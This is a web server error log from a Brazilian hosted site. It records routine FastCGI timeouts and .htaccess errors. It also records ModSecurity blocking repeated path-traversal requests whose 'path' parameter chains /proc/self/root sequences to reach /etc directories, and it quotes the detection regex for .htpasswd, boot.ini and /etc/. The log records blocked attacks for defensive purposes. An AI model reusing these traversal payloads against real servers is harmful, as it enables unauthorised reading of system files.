[Wed Mar 18 16:35:46.174454 2026] [:error] [pid 9800:tid 140411574073088] [client 74.7.241.31:43188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr-koJpNEVVDhwB8vOBHAAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:35:49.078506 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:44634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr-lQkwaGbbGflqUZBN3QAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:35:53.029844 2026] [proxy_fcgi:error] [pid 29882:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45772] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:36:16.141813 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46680] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:36:40.125803 2026] [proxy_fcgi:error] [pid 23798:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47656] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:36:42.611761 2026] [mime_magic:error] [pid 15826:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:44642] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/udev
[Wed Mar 18 16:36:42.612004 2026] [access_compat:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:44642] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/udev
[Wed Mar 18 16:37:02.145921 2026] [proxy_fcgi:error] [pid 9800:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48484] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:37:27.127428 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49248] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:37:34.554923 2026] [:error] [pid 9333:tid 140411674785536] [client 74.7.241.31:49092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr-_Q_eYRmh974Uj6T_0AAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:37:41.087046 2026] [mime_magic:error] [pid 23798:tid 140411658000128] (70014)End of file found: [client 57.141.18.105:52520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:37:51.046479 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49934] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:38:15.161182 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50624] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:38:43.081808 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51372] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:38:49.528049 2026] [core:alert] [pid 31803:tid 140411548894976] [client 74.7.241.31:35294] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/cache/man
[Wed Mar 18 16:39:09.936634 2026] [mime_magic:error] [pid 30077:tid 140411666392832] (70014)End of file found: [client 57.141.18.104:54734] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:39:15.122893 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52224] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:39:51.058085 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53334] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:40:20.122379 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54188] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:40:33.277005 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.244.43:45114] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr_seoXxyEfFpUF8f-xfAAAAVE"]
[Wed Mar 18 16:40:45.057912 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54804] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:40:45.074929 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.228.61:35620] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abr_vda6ubjKNq_cu4bZWwAAA00"]
[Wed Mar 18 16:41:07.037885 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55306] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:41:30.153815 2026] [proxy_fcgi:error] [pid 9800:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55894] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:41:34.911555 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:40204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr_7hkFeYa1D6dYQnCKFgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:41:40.737967 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 57.141.18.24:57978] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:41:44.332071 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:36830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr_-Na6ubjKNq_cu4bZfgAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 16:41:44.902826 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:45948] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/libexec
[Wed Mar 18 16:41:45.898876 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:36834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abr_-SmAPhZkrhU8w4mlpAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 16:41:54.132253 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56574] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:41:54.954342 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:34412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absAAkzinOy1jxa1j4dZpQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:41:59.557229 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:54876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absAB-oXxyEfFpUF8f-xqAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:42:07.535932 2026] [:error] [pid 9530:tid 140411674785536] [client 74.7.241.31:41176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absADwSuyh5UNeevTVfgVAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:42:17.133809 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57146] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:42:29.889053 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:51710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absAJSmAPhZkrhU8w4mlyAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:42:40.129811 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57748] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:43:03.143967 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58266] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:43:18.325021 2026] [mime_magic:error] [pid 14269:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:34852] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 16:43:26.045817 2026] [proxy_fcgi:error] [pid 9800:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58804] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:43:34.069448 2026] [core:alert] [pid 26799:tid 140411565680384] [client 57.141.18.38:60628] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:43:41.623345 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:38886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absAbRkFeYa1D6dYQnCKYwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:43:42.152676 2026] [mime_magic:error] [pid 9530:tid 140411624429312] (70014)End of file found: [client 57.141.18.12:60750] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:43:51.151788 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59356] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:44:16.133932 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59854] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:44:42.125803 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60424] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:45:03.840048 2026] [core:alert] [pid 17653:tid 140411699963648] [client 57.141.18.108:34314] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:45:05.361768 2026] [mime_magic:error] [pid 27403:tid 140411666392832] (70014)End of file found: [client 57.141.18.24:34066] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:45:11.133796 2026] [proxy_fcgi:error] [pid 9333:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60988] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:45:34.379230 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.244.43:44238] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absA3gbLMZ6AikZjR9X8tgAAAA4"]
[Wed Mar 18 16:45:45.125782 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33396] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:45:51.011231 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.228.61:47822] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absA7-oXxyEfFpUF8f-x2wAAAVY"]
[Wed Mar 18 16:46:19.122944 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34178] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:46:48.125818 2026] [proxy_fcgi:error] [pid 29882:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34882] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:47:05.861780 2026] [mime_magic:error] [pid 30077:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:65194] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:47:09.136304 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35342] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:47:30.121796 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35742] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:47:52.131434 2026] [proxy_fcgi:error] [pid 9800:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36352] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:48:14.661933 2026] [core:alert] [pid 23798:tid 140411733534464] [client 74.7.241.31:43890] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib
[Wed Mar 18 16:48:15.073215 2026] [proxy_fcgi:error] [pid 9800:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36818] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:48:20.912722 2026] [mime_magic:error] [pid 31803:tid 140411540502272] (70014)End of file found: [client 74.7.241.31:56090] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root
[Wed Mar 18 16:48:36.117789 2026] [proxy_fcgi:error] [pid 23798:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37298] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:48:58.129864 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37768] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:49:16.044141 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:48748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absBu-yqAr6etmhZHNoGUQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 16:49:20.119854 2026] [proxy_fcgi:error] [pid 23798:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38266] AH01075: Error dispatching request to : (polling)
